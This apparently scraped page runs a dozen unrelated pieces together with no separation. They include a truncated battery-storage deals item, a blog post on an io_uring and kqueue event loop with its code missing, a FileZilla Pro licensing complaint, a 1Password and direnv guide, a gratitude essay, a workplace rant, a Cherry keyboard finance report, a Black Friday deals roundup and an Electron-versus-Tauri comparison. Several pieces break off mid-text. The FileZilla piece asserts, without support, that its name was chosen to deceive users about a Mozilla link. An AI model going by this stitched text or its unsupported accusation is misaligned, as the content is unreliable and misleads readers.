In a major week for European BESS deal-making, project acquisition and financing deals have been done in the Poland, Germany, Finland, the UK and Romania for grid-scale projects totalling well over 1GW of capacity.
Utility and power firm LEAG has partnered with Chinese system integrator HyperStrong for a 400MW/1,600MWh BESS in Saxony, Germany.
Most Popular
A Programmer-Friendly I/O Abstraction Over io_uring and kqueue
Consider this tale of I/O and performance. We’ll start with blocking
I/O, explore io_uring and kqueue, and take home an event loop very
similar to some software you may find familiar.
When you want to read from a file you might
open()
and
then call
read()
as many times as necessary to fill a
buffer of bytes from the file. And in the opposite direction, you call
write()
as many times as needed until everything is
written. It’s similar for a TCP client with sockets, but instead of
open()
you first call
socket()
and then
connect()
to your server. Fun stuff.
In the real world though you can’t always read everything you want
immediately from a file descriptor. Nor can you always write everything
you want immediately to a file descriptor.
You can
switch
a file descriptor into non-blocking mode
so the call won’t block
while data you requested is not available. But system calls are still
expensive, incurring context switches and cache misses. In fact,
networks and disks have become so fast that these costs can start to
approach the cost of doing the I/O itself. For the duration of time a
file descriptor is unable to read or write, you don’t want to waste time
continuously retrying read or write system calls.
So you switch to io_uring on Linux or kqueue on FreeBSD/macOS. (I’m
skipping the generation of epoll/select users.) These APIs let you
submit requests to the kernel to learn about readiness: when a file
descriptor is ready to read or write. You can send readiness requests in
batches (also referred to as queues). Completion events, one for each
submitted request, are available in a separate queue.
Being able to batch I/O like this is especially important for TCP
servers that want to multiplex reads and writes for multiple connected
clients.
However in io_uring, you can even go one step further. Instead of
having to call
read()
or
write()
in userland
after a readiness event, you can request that the kernel do the
read()
or
write()
itself with a buffer you
provide. Thus almost all of your I/O is done in the kernel, amortizing
the overhead of system calls.
If you haven’t seen io_uring or kqueue before, you’d probably like an
example! Consider this code: a simple, minimal, not-production-ready TCP
echo server.
This is a great, minimal example. But notice that this code ties
io_uring behavior directly to business logic (in this case, handling
echoing data between request and response). It is fine for a small
example like this. But in a large application you might want to do I/O
throughout the code base, not just in one place. You might not want to
keep adding business logic to this single loop.
Instead, you might want to be able to schedule I/O and pass a
callback (and sometimes with some application context) to be called when
the event is complete.
The interface might look like:
io_dispatch.dispatch({// some big struct/union with relevant fields for all event types}, my_callback);
This is great! Now your business logic can schedule and handle I/O no
matter where in the code base it is.
Under the hood it can decide whether to use io_uring or kqueue
depending on what kernel it’s running on. The dispatch can also batch
these individual calls through io_uring or kqueue to amortize system
calls. The application no longer needs to know the details.
Additionally, we can use this wrapper to stop thinking about
readiness events, just I/O completion. That is, if we dispatch a read
event, the io_uring implementation would actually ask the kernel to read
data into a buffer. Whereas the kqueue implementation would send a
“read” readiness event, do the read back in userland, and then call our
callback.
And finally, now that we’ve got this central dispatcher, we don’t
need spaghetti code in a loop switching on every possible submission and
completion event.
Every time we call io_uring or kqueue we both submit event requests
and poll for completion events. The io_uring and kqueue APIs tie these
two actions together in the same system call.
To sync our requests to io_uring or kqueue we’ll build a
flush
function that submits requests and polls for
completion events. (In the next section we’ll talk about how the user of
the central dispatch learns about completion events.)
To make
flush
more convenient, we’ll build a nice
wrapper around it so that we can submit as many requests (and process as
many completion events) as possible. To avoid accidentally blocking
indefinitely we’ll also introduce a time limit. We’ll call the wrapper
run_for_ns
.
Finally we’ll put the user in charge of setting up a loop to call
this
run_for_ns
function, independent of normal program
execution.
This is now your traditional event loop.
You may have noticed that in the API above we passed a callback. The
idea is that after the requested I/O has completed, our callback should
be invoked. But the question remains: how to track this callback between
the submission and completion queue?
Thankfully, io_uring and kqueue events have user data fields. The
user data field is opaque to the kernel. When a submitted event
completes, the kernel sends a completion event back to userland
containing the user data value from the submission event.
We can store the callback in the user data field by setting it to the
callback’s pointer casted to an integer. When the completion for a
requested event comes up, we cast from the integer in the user data
field back to the callback pointer. Then, we invoke the callback.
As described above, the struct for
io_dispatch.dispatch
could get quite large handling all the different kinds of I/O events and
their arguments. We could make our API a little more expressive by
creating wrapper functions for each event type.
So if we wanted to schedule a read function we could call:
One more thing we need to worry about is that the batch we pass to
io_uring or kqueue has a fixed size (technically, kqueue allows any
batch size but using that might introduce unnecessary allocations). So
we’ll build our own queue on top of our I/O abstraction to keep track of
requests that we could not immediately submit to io_uring or kqueue.
To keep this API simple we could allocate for each entry in the
queue. Or we could modify the
io_dispatch.X
calls slightly
to accept a struct that can be used in an
intrusive
linked list
to contain all request context, including the callback.
The latter is
what
we do in TigerBeetle
.
Put another way: every time code calls
io_dispatch
,
we’ll try to immediately submit the requested event to io_uring or
kqueue. But if there’s no room, we store the event in an overflow
queue.
The overflow queue needs to be processed eventually, so we update our
flush
function (described in
Callbacks and context
above) to pull
as many events from our overflow queue before submitting a batch to
io_uring or kqueue.
We’ve now built something similar to
libuv
, the I/O library that
Node.js uses. And if you squint, it is basically TigerBeetle’s I/O
library! (And interestingly enough, TigerBeetle’s I/O code was
adopted
into Bun! Open-source for the win!)
Let’s check out how the
Darwin
version
of TigerBeetle’s I/O library (with kqueue) differs from the
Linux
version
. As mentioned, the complete
send
call in the
Darwin implementation waits for file descriptor readiness (through
kqueue). Once ready, the actual
send
call is made back in
userland:
Similarly, take a look at
flush
on
Linux
and
macOS
for event processing. Look at
run_for_ns
on
Linux
and
macOS
for the public API users must call. And finally, look at what puts this
all into practice, the loop calling
run_for_ns
in
src/main.zig.
We’ve come this far and you might be wondering — what about
cross-platform support for Windows? The good news is that Windows also
has a completion based system similar to io_uring but without batching,
called
IOCP
.
And for bonus points, TigerBeetle provides the
same
I/O abstraction over it
! But it’s enough to cover just Linux and
macOS in this post. :)
In both this blog post and in TigerBeetle, we implemented a
single-threaded event loop. Keeping I/O code single-threaded in
userspace is beneficial (whether or not I/O processing is
single-threaded in the kernel is not our concern). It’s the simplest
code and best for workloads that are not embarrassingly parallel. It is
also best for determinism, which is integral to the design of
TigerBeetle because it enables us to do Deterministic Simulation
Testing
But there are other valid architectures for other workloads.
For workloads that are embarrassingly parallel, like many web
servers, you could instead use multiple threads where each thread has
its own queue. In optimal conditions, this architecture has the highest
I/O throughput possible.
But if each thread has its own queue, individual threads can become
starved if an uneven amount of work is scheduled on one thread. In the
case of dynamic amounts of work, the better architecture would be to
have a single queue but multiple worker threads doing the work made
available on the queue.
Hey, maybe we’ll split this out so you can use it too. It’s written
in Zig so we can easily expose a C API. Any language with a C foreign
function interface (i.e. every language) should work well with it. Keep
an eye on
our GitHub
.
:)
FileZilla Pro “Perpetual License” - A Warning to All Users
This is a blunt warning to anyone who ever purchased, or is thinking about purchasing, FileZilla Pro.
I bought FileZilla Pro under a
perpetual license
- a one-time payment, lifetime right to use the version I purchased. After reinstalling my operating system, I simply needed to reinstall the software I already paid for.
Here’s what happened:
Support admitted I
still have the legal right
to use the old version of FileZilla Pro that I originally purchased.
Then they told me they
refuse to provide the installer
for that version.
Their excuse:
“For security reasons we do not provide older versions.”
The impact:
If a customer cannot download the installer, the “perpetual license” is
dead
.
It doesn’t matter what rights they acknowledge on paper - they are blocking any practical way to use the software unless you pay again under their new subscription model.
There is no way to reinstall.
There is no way to access the product you bought.
Your “perpetual license” effectively becomes worthless the moment you reinstall your OS or lose the installer.
What this means for users:
FileZilla is fully aware that customers legally own those old versions.
They openly admit it.
And then they withhold the installer anyway, leaving users with no realistic option except paying again.
If you’re considering FileZilla Pro, understand exactly what you are walking into:
You can pay for a perpetual license, and later be denied any way to reinstall the product you legally own.
Name clarification
Although “Zilla” appears in the name, the FileZilla project is
not
affiliated with Mozilla in any way. The similarity in naming is
not coincidental
. Their intention is to deceive users into thinking this project is related to Mozilla so they can
sell perpetual licenses that do not persist across OS reinstalls
.
Sometimes you need to set environment variables with secrets, API keys or tokens, but
they can be susceptible to exfiltration by malware, as seen during the
recent Shai-Hulud attack
.
Then open 1Password > Settings > Developer > Integrate with 1Password CLI.
Then you can use the
op
command with your password item’s name in 1Password:
$ op item get "My secret item" --fields password
[use 'op item get xkm4wrtpvnq8hcjd3yfzs2belg --reveal' to reveal]
This obscures the actual password, and gives the item’s ID. You can use this ID:
$ op item get xkm4wrtpvnq8hcjd3yfzs2belg --fields password
[use 'op item get xkm4wrtpvnq8hcjd3yfzs2belg --reveal' to reveal]
Use
--reveal
to see the actual password:
$ op item get "My secret item" --fields password --reveal
my-secret-password
$ op item get xkm4wrtpvnq8hcjd3yfzs2belg --fields password --reveal
my-secret-password
Alternatively, use a
secret reference
.
Open the item in 1Password, next to the password click ⌄ and select Copy Secret
Reference then
op read
it:
$ op read"op://MyVault/xkm4wrtpvnq8hcjd3yfzs2belg/password"my-secret-password
The secret reference is made up of the vault name and item ID, and
op read
doesn’t
need
--reveal
.
direnv
is a handy shell tool that can load and unload environment
variables depending on your current directory.
Next, let’s set up direnv so that when you
cd
into a certain directory, it fetches the
password from 1Password and sets it as an env var. When
cd
ing out, the env var is
unloaded.
(I first got “Warning: direnv not found. Please install direnv and ensure it’s in your
PATH before using this plugin” so needed to move
eval "$(/opt/homebrew/bin/brew shellenv)"
before
source $ZSH/oh-my-zsh.sh
.)
Now, in your project directory, create a file called
.envrc
containing an env var
export that calls
op
:
Sometimes it shows a warning because of the 1Password UI prompt, but it’s okay:
$cd my-project
direnv: loading ~/my-project/.envrc
direnv: ([/opt/homebrew/bin/direnv export zsh]) is taking a while to execute. Use CTRL-C to give up.
direnv: export +DEBUG +MY_SECRET
That your dog, while she appears to love you only because she’s been adapted by evolution to appear to love you, really does love you.
That if you’re a life form and you cook up a baby and copy your genes to them, you’ll find that the genes have been degraded due to oxidative stress et al., which isn’t cause for celebration, but if you find some other hopefully-hot person and randomly swap in half of their genes, your baby will still be somewhat less fit compared to you and your hopefully-hot friend on average, but now there is variance, so if you cook up several babies, one of them might be as fit or even fitter than you, and that one will likely have more babies than your other babies have, and thus complex life can persist in a universe with increasing entropy.
That if we wanted to, we surely
could
figure out which of the 300-ish strains of rhinovirus are circulating in a given area at a given time and rapidly vaccinate people to stop it and thereby finally “cure” the common cold, and though this is too annoying to pursue right now, it seems like it’s just a matter of time.
That if you look back at history, you see that plagues went from Europe to the Americas but not the other way, which suggests that urbanization and travel are great allies for infectious disease, and these both continue today but are held in check by sanitation and vaccines even while we have lots of tricks like UVC light and high-frequency sound and air filtration and waste monitoring and paying people to stay home that we’ve barely even put in play.
That while engineered infectious diseases loom ever-larger as a potential very big problem, we also have lots of crazier tricks we
could
pull out like panopticon viral screening or toilet monitors or daily individualized saliva sampling or engineered microbe-resistant surfaces or even dividing society into cells with rotating interlocks or having people walk around in little personal spacesuits, and while admittedly most of this doesn’t sound awesome, I see no reason this shouldn’t be a battle that we would win.
That clean water, unlimited, almost free.
That dentistry.
That tongues.
That radioactive atoms either release a ton of energy but also quickly stop existing—a gram of Rubidium-90 scattered around your kitchen emits as much energy as ~200,000 incandescent lightbulbs but after an hour only 0.000000113g is left—or don’t put out very much energy but keep existing for a long time—a gram of Carbon-14 only puts out the equivalent of 0.0000212 light bulbs but if you start with a gram, you’ll still have 0.999879g after a year—so it isn’t actually
that
easy to permanently poison the environment with radiation although Cobalt-60 with its medium energy output and medium half-life is unfortunate, medical applications notwithstanding I still wish Cobalt-60 didn’t exist, screw you Cobalt-60.
That while curing all cancer would only increase life expectancy by ~3 years and curing all heart disease would only increase life expectancy by ~3 years, and preventing all accidents would only increase life expectancy by ~1.5 years, if we did all of these at the same time and then a lot of other stuff too, eventually the effects would go nonlinear, so trying to cure cancer isn’t actually a waste of time, thankfully.
That the peroxisome, while the mitochondria and their stupid Krebs cycle get all the attention, when a fatty-acid that’s too long for them to catabolize comes along, who you gonna call.
That we have preferences, that there’s no agreed ordering of how good different things are, which is neat, and not something that would obviously be true for an alien species, and given our limited resources probably makes us happier on net.
That cardamom, it is cheap but tastes expensive, if cardamom cost 1000× more, people would brag about how they flew to Sri Lanka so they could taste chai made with fresh cardamom and swear that it changed their whole life.
That Gregory of Nyssa, he was right.
That Grandma Moses, it’s not too late.
That sleep, that probably evolution first made a low-energy mode so we don’t starve so fast and then layered on some maintenance processes, but the effect is that we live in a cycle and when things aren’t going your way it’s comforting that reality doesn’t stretch out before you indefinitely but instead you can look forward to a reset and a pause that’s somehow neither experienced nor skipped.
That, glamorous or not, comfortable or not, cheap or not, carbon emitting or not, air travel is very safe.
That, for most of the things you’re worried about, the markets are less worried than you and they have the better track record, though not the issue of your mortality.
That sexual attraction to romantic love to economic unit to reproduction, it’s a strange bundle, but who are we to argue with success.
That every symbolic expression recursively built from differentiable elementary functions has a derivative that can also be written as a recursive combination of elementary functions, although the latter expression may require vastly more terms.
That every expression graph built from differentiable elementary functions and producing a scalar output has a gradient that can itself be written as an expression graph, and furthermore that the latter expression graph is always the same size as the first one and is easy to find, and thus that it’s possible to fit very large expression graphs to data.
That, eerily, biological life and biological intelligence does not appear to make use of that property of expression graphs.
That if you look at something and move your head around, you observe the entire light field, which is a five-dimensional function of three spatial coordinates and two angles, and yet if you do something fancy with lasers, somehow that entire light field can be stored on a single piece of normal two-dimensional film and then replayed later.
That, as far as I can tell, the reason five-dimensional light fields can be stored on two-dimensional film simply cannot be explained without quite a lot of wave mechanics, a vivid example of the strangeness of this place and proof that all those physicists with their diffractions and phase conjugations really are up to something.
That disposable plastic, littered or not, harmless when consumed as thousands of small particles or not, is popular for a reason.
That disposable plastic, when disposed of correctly, is literally carbon sequestration, and that if/when air-derived plastic replaces dead-plankton-derived plastic, this might be incredibly convenient, although it must be said that currently the carbon in disposable plastic only represents a single-digit percentage of total carbon emissions.
That rocks can be broken into pieces and then you can’t un-break the pieces but you can check that they came from the same rock, it’s basically cryptography.
That the deal society has made is that if you have kids then everyone you encounter is obligated to chip in a bit to assist you, and this seems to mostly work without the need for constant grimy negotiated transactions as Econ 101 would suggest, although the exact contours of this deal seem to be a bit murky.
That of all the humans that have ever lived, the majority lived under some kind of autocracy, with the rest distributed among tribal bands, chiefdoms, failed states, and flawed democracies, and only something like 1% enjoyed free elections and the rule of law and civil liberties and minimal corruption, yet we endured and today that number is closer to 10%, and so if you find yourself outside that set, do not lose heart.
That if you were in two dimensions and you tried to eat something then maybe your body would split into two pieces since the whole path from mouth to anus would have to be disconnected, so be thankful you’re in three dimensions, although maybe you could have some kind of jigsaw-shaped digestive tract so your two pieces would only jiggle around or maybe you could use the same orifice for both purposes, remember that if you ever find yourself in two dimensions, I guess.
Disclaimer: this is based on emotions and not much else
I'm so tired of reading the same post 10x because everyone wants to be included.
What's hot right now is the CloudFlare outage. Everyone misses the actual issue which was that there were no (automated) tests/QA that were done to prevent this bug. Even a feature flag would've been sufficient so they could've seen the issue early-on.
This is what every LinkedIn poster does:
Open ChatGPT
"Rewrite this linkedin post about the cloudflare outage"
AI steers towards the use of
.unwrap()
LinkedIn man doesn't fact check anything or reads the post-mortem
Result:
"Le unwrap is le dangerous. Here's how the unwrap works"
I'm so fucking tired. I don't care about your company, nor do I care about you. I don't care because YOU don't care either about what you post. You don't care about your career, only how it looks. In hindsight, this is the perfect representation of how LLM's function, so I'm not surprised managers are best friends with ChatGPT.
I'm not surprised corporate social media is lifeless, but I'm surprised no one actually cares. How do these people stay motivated to do anything. It can't just be money, right?
I added a disclaimer because I do feel like this post is very short-sighted. This feeling roots into the fact I'm tired of corporate hell, and these feelings resulted in me not being very productive at work. This also resulted in me being let go soon (also known as a PIP!).
You can skip this part if you don't care about my career.
When I started out at $COMPANY, it was mostly building tools with, from time to time, a manager doing a check-up. This worked amazingly, as I had time to learn and improve, and I was able to deliver.
Fast-forward a few months, we now have 3 managers, 1 dev (hi), and a buttload of busywork that needs to be done yesterday. From what I understand, a manager is supposed to be your safetynet and keep the context switching to a minimum. Tickets should feel like little updates, yet they take up 40% of my work (which could've been spent on solutioning). Since I'm the lead dev, any busywork will move tickets further back. This also means I'm to blame, because I should've been way earlier with alerting
them
about the project's drift. I'M NOT A PM! It's my job to make the project and keep you up to date. If this isn't sufficient then go to the PM (oh wait, that's not me!). Another big issue I have with this workflow is that we're sometimes moving priorization mid-cycle due to client requests. This is fine if it wasn't low priority stuff a client
wants
but doesn't
need
.
I get almost nothing done and I've grown tired of living in Linear. I wouldn't say I'm burnt-out. Similarly to an orgasm, you'd know if you had one. The company has turned into a startup with only the shortcomings and all of the corporate hell I wanted to avoid.
As I mentioned before, I'm being let go in January (as well as other people at the company). 2026 is going to start interestingly, but I think it would be free-ing. I still wish everyone at the company the best, because there are some smart and kind people I will miss.
DeepSeekMath-V2: Towards Self-Verifiable Mathematical Reasoning [pdf]
The deficit at Cherry is adding up. From January 2025 to the end of September, the company made a net loss of almost 20.4 million euros, with a turnover of 70.7 million euros. Cherry now has more debt than equity (equity deficit), which recently led to an
extraordinary general meeting
.
Made in China
Chief Operating Officer (COO) Udo Streller announced there that the switch production in Auerbach has now been completely discontinued. Instead, Cherry has outsourced production to "established partners in China and Slovakia".
The patent for the Cherry MX design finally expired in 2014. Since then, more and more Chinese companies have been producing switches that are also of comparable quality to Cherry's. Alternatives include JWK, Gateron, SP Star, Kailh, KTT, Outemu, and Tecsee. Switches from China were among the first to be lubricated with grease or oil from the factory. They are also experimenting with materials. Cherry is lagging behind its Far Eastern competitors in so-called Hall effect switches with magnetic fields.
There are now countless switch variants. Providers like Razer and Logitech also have their self-marketed types produced by Chinese manufacturers, such as Kailh.
Auerbach will henceforth function as a "cost-effective development, logistics, and service hub" for Cherry. Contracts with an external logistics partner expire at the end of the year.
There are now countless keyboard switches from various manufacturers, mostly in colorful housings.
(Image: Mark Mantel/ heise medien)
Partial sale
Restructuring, loans, and capital injections from investors are not enough to keep Cherry afloat. The manufacturer therefore wants to sell either the peripherals division or the Digital Health & Solutions division to use the proceeds to boost the remaining division.
The peripherals business includes all keyboards and mice, including gaming and office models. Switches are separate from this and are part of the Components division. Digital Health & Solutions includes card readers, PIN pads, and telematics-compliant applications such as the TI Messenger.
CFO Jurjen Jongma said at the general meeting: "Due to the group's low market capitalization and the current share price of Cherry below one euro, it is currently neither possible nor advisable to strengthen the group's equity in any way other than through strategic mergers & acquisitions options."
Cherry has already sold the hygiene peripheral device division "Active Key" for 12.5 million plus an option for an additional 8.5 million euros upon achievement of financial targets. Active Key included, for example, washable keyboards.
Sales slump
According to its statements, Cherry benefited from high demand during the coronavirus pandemic, which has since subsided. In 2021, Cherry's turnover was still 168.5 million euros. In 2022, annual sales of gaming products halved to 41.2 million euros. In 2023, it recovered, but the Digital Health & Solutions division slipped by a good 30 percent to 23 million euros. Components turnover halved to 10.9 million euros.
Read also
In 2025 (until the end of September), gaming and office peripherals have so far generated 50.3 million euros in sales, Digital Health & Solutions 16.5 million, and components 3.9 million. In healthcare, Cherry is facing a shift: Around 90,000 medical supply providers, such as physiotherapists, will only be connected to the telematics infrastructure on October 1 2027, instead of January 1 2026.
Empfohlener redaktioneller Inhalt
Mit Ihrer Zustimmung wird hier ein externer Preisvergleich (heise Preisvergleich) geladen.
Ich bin damit einverstanden, dass mir externe Inhalte angezeigt werden.
Damit können personenbezogene Daten an Drittplattformen (heise Preisvergleich) übermittelt werden.
Mehr dazu in unserer
Datenschutzerklärung
.
This article was originally published in
German
.
It was translated with technical assistance and editorially reviewed before publication.
The 20+ best US Black Friday tech deals on TVs, tablets, phones, smart watches and more
Guardian
www.theguardian.com
2025-11-27 18:20:50
The sales you’ve been waiting for all year have arrived. Snag deals from Samsung, Amazon, Sony and moreThe 43 very best US Black Friday and Cyber Monday deals, curated and vettedSign up for the Filter US newsletter, your weekly guide to buying fewer, better thingsBlack Friday started off as a way to...
B
lack Friday started off as a way to score some great deals on gifts, but let’s be honest: it’s also a chance to pick up some nice, deeply discounted goodies for yourself. This is especially true in the world of tech, where high prices and personal taste mean it’s often just safest to buy what works for you rather than guessing on a gift. Don’t worry, we won’t judge.
But when you’re inundated with Black Friday and Cyber Monday deals, it’s easy to get spun around by specs: is that really enough storage? Is the screen big enough? Will I regret not getting the newer version? That’s when you turn to the experts.
I’ve been a professional tech reviewer since 2013 and I have reviewed all manner of gadgets, from phone to keyboards and even
augmented reality glasses
. If they ever put Wi-Fi in a hamburger, I’ll tell you what’s great about it, and what still needs work.
How I selected these Black Friday and Cyber Monday tech deals
For this list of deals, I studied deal sites, forums and databases of deals to find deep discounts on products that I know and love. I’ve personally used many of the items in this roundup, held them up in my hand, used them daily in my life, and in many cases, written reviews of them. And in the cases where I haven’t, I know the companies and product space enough to feel confident making recommendations. While plenty of these gadgets would make great gifts, you’ll also find plenty of opportunities to upgrade your own home, if you’re so inclined.
Here are some of the best deals I’ve been able to find so far. This list will be constantly updated through November, so make sure to check back.
This article was updated on 20 November with the latest prices and availability.
The very best Black Friday and Cyber Monday tech deals
Whether I’m reading or watching a movie, the Amazon Fire HD 10 tablet has a beautiful screen and just the right amount of power to stream content: you don’t need much computing muscle to turn pages of a book or play back a video. It’s also very durable, so it’s great for coffee table reading. While a Fire tablet isn’t as useful as a full Android tablet, at this price it’s still a great deal, even if it only ends up as your Netflix screen to go.
JBL is an iconic name in sound, and the JBL Live Pro 2 are some of my favorite earbuds. They have excellent Active Noise Cancellation (ANC), which makes it easier to listen to your music at a lower volume to avoid hearing damage. You also get excellent battery life, at up to 10 hours on a single charge, so these can be a great musical companion for the vibe-coders in your life to blot out the world for hours while they crack on the next big thing. I’d heartily recommend them at full price, so at half-off they’re a no brainer.
Smart cameras typically come with a big trade-off: you need to either run an ugly wire to them or change the battery every couple months. But the Blink Outdoor 4 Wireless camera sidesteps both with a battery that can last up to two years. I’ve had one for about a year so far, and the battery shows no signs of stopping. You can put this camera anywhere it has access to wifi and basically forget it exists, except when you want to see what’s going on in your yard. At 60% off, it’s worth grabbing a few for different parts of the house and yard.
The Amazon Fire TV Stick 4K plus remains the single easiest way to turn a regular TV into a smart TV. Just plug it into your TV and a power source, and just like that you have access to streaming services such as Netflix and Hulu, Amazon and Blink camera feeds, and of course Alexa. The ultra-simple remote makes for easy navigation, and has a built-in mic for voice commands (“Hey Alexa, play The Office.”) At 50% off, you can grab one for every TV in the house, or even one to travel with – it’s tiny.
Samsung’s latest smartwatch brings a ton of improvements to your wrist, including totally redesigned software that makes it easier to use. Like most smart watches, it can track your sleep and monitor your heart rate during exercise, but it also performs some unique feats like measuring antioxidants to help suggest dietary changes, and tracking blood-oxygen levels to flag potential health issues. It all comes wrapped in an attractive package that lasts for almost two days on a charge.
Photograph: Courtesy of Amazon
Amazon Fire HD 8 Tablet Plus Standing Cover Bundle
The Amazon Fire HD 8 is a slightly smaller version of the aforementioned Amazon Fire Tablet that’s better suited to travel. This particular bundle also includes a case with an origami-style leg to prop up the tablet up for watching shows on the go. Like the larger model, it’s mainly a media machine, so imagine it more like a portable TV than a full-fledged tablet. At this price, it’s still well worth it.
I review phones year-round, and this is the one I go back to when I’m not reviewing anything else. It’s simply one of the best Android smartphones. It has an amazing camera setup great for ultrawide snaps and zooming in to a crazy degree, onboard AI including Gemini Live, epic battery life (easily a day and a half), and a built-in stylus for those times you want precision in your tapping and swiping. This price tag may not seem like much of a discount since the S25 Ultra usually starts at about $1,200, but this is the upgraded model with 512GB storage, which you’re going to want.
Samsung’s “fan edition” (FE) devices are designed for buyers who want a flagship phone experience at a lower price point. That means the S25 FE phone has most of the same chops as its larger siblings, including all the same AI tricks, and an impressive triple-camera setup that’s no joke. It’s a great value even at full price, and at 27% off one of the best phone deals out there for Black Friday.
Bone-conduction headphones don’t go in your ears – they sit above the ear and transit crisp, clear audio with a full range of tones by simply vibrating against your head. That means you can still hear everything going on around you, making them ideal for runners. But they’re great for non-runners too – like me! I use them often on bike rides.
Bose has been a leader in noise-cancelling headphones for decades, and the QuietComfort series of headphones carry on the legacy. These headphones are great for frequent travelers as they can cancel out the drone of planes, trains, or automobiles, while you enjoy the film Planes, Trains, and Automobiles. You don’t often see these headphones at this price, so these would be a great pickup.
If the traveler in your life doesn’t want to carry a bulky set of over-the-ear headphones (like me), earbuds like these are a great solution. Like their bigger brothers, these offer outstanding active noise cancellation to drown out airplane noise, but they’re also compact and still have good battery life. Since they’re earbuds, they form a great seal in your ear canal, which passively seals out noise even when ANC isn’t active. At this price, these earbuds are hard to resist, especially when compared to their peers at $130.
A pair of black Sony WF-1000XM5 Earbuds
Photograph: Courtesy of Sony
Sony headphones are a cut above the rest in terms of sound quality: when I tested the WF-1000XM5, I heard tones in music that I had never heard before. I believe they’re the best-sounding earbuds you can buy, and the Guardian’s reviewer
loved them too
. Their popularity means Sony seldom needs to discount them, so 30% off is hard to ignore. If you know someone who loves music but still listens with cheap headphones, this will open a whole new world.
Of all the voice assistants I’ve used (all of them), Alexa is the best, providing fast, accurate answers and controlling your smart home devices just as quickly. You can check the weather, get the latest news, listen to podcasts and more with just your voice. While Google Assistant and Siri have stagnated, Alexa continues to evolve and improve: An AI-enabled version called Alexa+ just rolled out this year for Prime subscribers.
Lots of smart-home products are gimmicky, but we
wholeheartedly recommend smart bulbs
. You can have them turn on automatically at dusk, wake you up slowly in the morning as an alarm clock, or just answer to your voice commands. A multicolor bulb like this Kasa model also lets you set the mood with one of 16m colors. A two-pack for $15.99 is an instant upgrade to your home.
Photograph: Courtesy of Amazon
TP-Link Deco X15 Dual-Band AX1500 WiFi 6 Mesh Wi-Fi System
If you have wifi dead spots in your home, a mesh wifi network is an easy modern way to fix the issue. A mesh system uses multiple access points to blanket your home in signal, and automatically switches your devices to the closest one, so you’ll no longer drop Zoom calls when you walk into that one corner of your basement. This system comes with three points, which should be plenty for most homes, but you can easily add more.
Meta has been leading the way in the VR space for a decade, and the Meta Quest 3S is the most accessible headset on the market today. My favorite game is
Hell Horde
,
a first-person shooter in which demons come running at you through a hole in your living room wall. It’s wild, and there are games for all interests including
The Climb
,
Beat Saber
,
Star Wars: Beyond Victory
and more.
The HoverAir X1 is less of a drone and more of a flying camera that keeps you the center of its focus. It can fly preprogramed routes to capture the scenery around you or follow you around, dodging obstacles along the way. When I tested this drone, I rode an electric bike for five miles under and around trees, and it kept up beautifully. It’s foldable and fits neatly in a jacket pocket.
Few flat-screen TVs come with sufficient built-in sound, and even if yours seems OK, a soundbar takes things to another level. This BRAVIA Theater Bar 6 comes with a separate subwoofer and two rear-channel speakers to fill your room with sound, and the rear channels are wireless for easier installation. Once you hear it, you will never want to watch TV again without it.
We live in an amazing time when you can buy a 75in 4K TV for under $400. This model even uses QLED technology for better color accuracy, which used to be a premium feature just a few years ago. Since it’s a Roku TV, all of your streaming services are at your fingertips right out of the box. This is a one-off model that appears to be exclusive to Walmart, so you won’t find reviews on it, but Hisense is a reputable brand and TVs have matured so much that even budget models hold their own to most eyeballs.
For color fidelity and contrast, most home theater enthusiasts still turn to OLED screens, but they seldom come cheap. This is a great deal on a high-end example, just one rung below Samsung’s flagship S95F. Gamers will appreciate the 144Hz refresh rate for smoother action, and the AI processor for 4K upscaling means that even older shows and movies will make use of every pixel.
The
Dolt Workbench
is an open-source SQL workbench supporting MySQL, Postgres,
Dolt
, and
Doltgres
databases. We built the workbench using
Electron
, which is a popular framework that allows you to convert web apps built with traditional web technologies like HTML, CSS, and Javascript to desktop applications. Since the workbench shares much in common with
DoltHub
and
Hosted Dolt
, the architecture is very similar to those products. That is, the workbench uses
Next.js
for the frontend with an additional GraphQL layer that handles database interactions. For this reason, it made a lot of sense to use Electron to get the desktop version of our application up and running.
That said, Electron comes with a few rather significant drawbacks, and those drawbacks have started to become more apparent as the workbench has matured. Because of this, I spent some time exploring
Tauri
, a newer framework that supports the same web-to-desktop use case as Electron. In this article, we’ll discuss how well Electron and Tauri integrate with the workbench, and weigh some pros and cons between the two frameworks.
Next.js doesn’t translate very cleanly to a desktop application context. This is primarily due to the framework’s architecture around server-side rendering and API routing features. In a desktop app, there’s no application server interacting with a client; we just need to render HTML, CSS, and JavaScript in a window. For these reasons, Electron only loosely supports Next.js applications. That’s not to say you can’t build an Electron app with Next.js, but it requires some workarounds to make it function properly. One of the more popular workarounds is a project called
Nextron
, which aims to wire Next.js applications to the Electron framework and streamline the build process. This is the project we use for the workbench. The issue is that, at the time of writing, it appears that Nextron is no longer being maintained, and we started hitting a few bugs with it.
Tauri is largely frontend-framework agnostic. For Next, specifically, you still can’t use the server-side features, but Tauri makes the integration process much simpler by relying on Next’s static-site generation capabilities. To make a Next app work with Tauri, you just need to set
output: 'export'
in your Next configuration file, and Tauri handles the rest.
The biggest difference between Electron and Tauri comes from how they render the UI. The Electron framework comes with a full Chromium browser engine bundled in your application, which is the same engine that backs Google Chrome. This is useful because it means you don’t have to worry about browser compatibility issues. Regardless of the end user’s machine or architecture, the same Chromium instance renders your application UI. This results in a very standardized experience that ensures your app will look the same regardless of where it’s running. However, this also results in a fair amount of bloat. For the vast majority of desktop apps, a full Chromium browser engine is overkill. Even the simplest “Hello World” applications using Electron can run you up to 150 megabytes of disk space.
Tauri solves this problem by leveraging the system’s native webview. Instead of bundling a full browser engine, Tauri uses a library called
WRY
, which provides a cross-platform interface to the appropriate webview for the operating system. As you’d expect, this makes Tauri apps far more lightweight. The downside here is that you no longer have a hard guarantee on compatibility. From what I can tell, however, this mostly seems to be a non-issue. Compatibility issues across system webviews are exceedingly rare, especially for the major operating systems.
Another major difference between the two frameworks is how they handle the “main” process. This refers to the backend process that orchestrates the application windows, menus, and other components of a desktop app that require interaction with system APIs. In Electron, the main process runs in a Node.js environment. This means you get access to all the typical Node APIs, you can import things like normal, and, perhaps most importantly, you can write your Electron-specific code in pure JavaScript. This is a huge bonus for Electron’s target audience: web developers.
Tauri, on the other hand, uses Rust. All the framework code and the main process entrypoint are written in Rust. Obviously, this makes it a bit less accessible to the average web developer. That said, Tauri provides a fairly robust set of JavaScript APIs to interact with the Rust layer. For most applications, these APIs will be sufficient to do what you need to do. In the case of the workbench, I was able to fully replicate the functionality of the Electron version using the JavaScript APIs and some minimal Rust code.
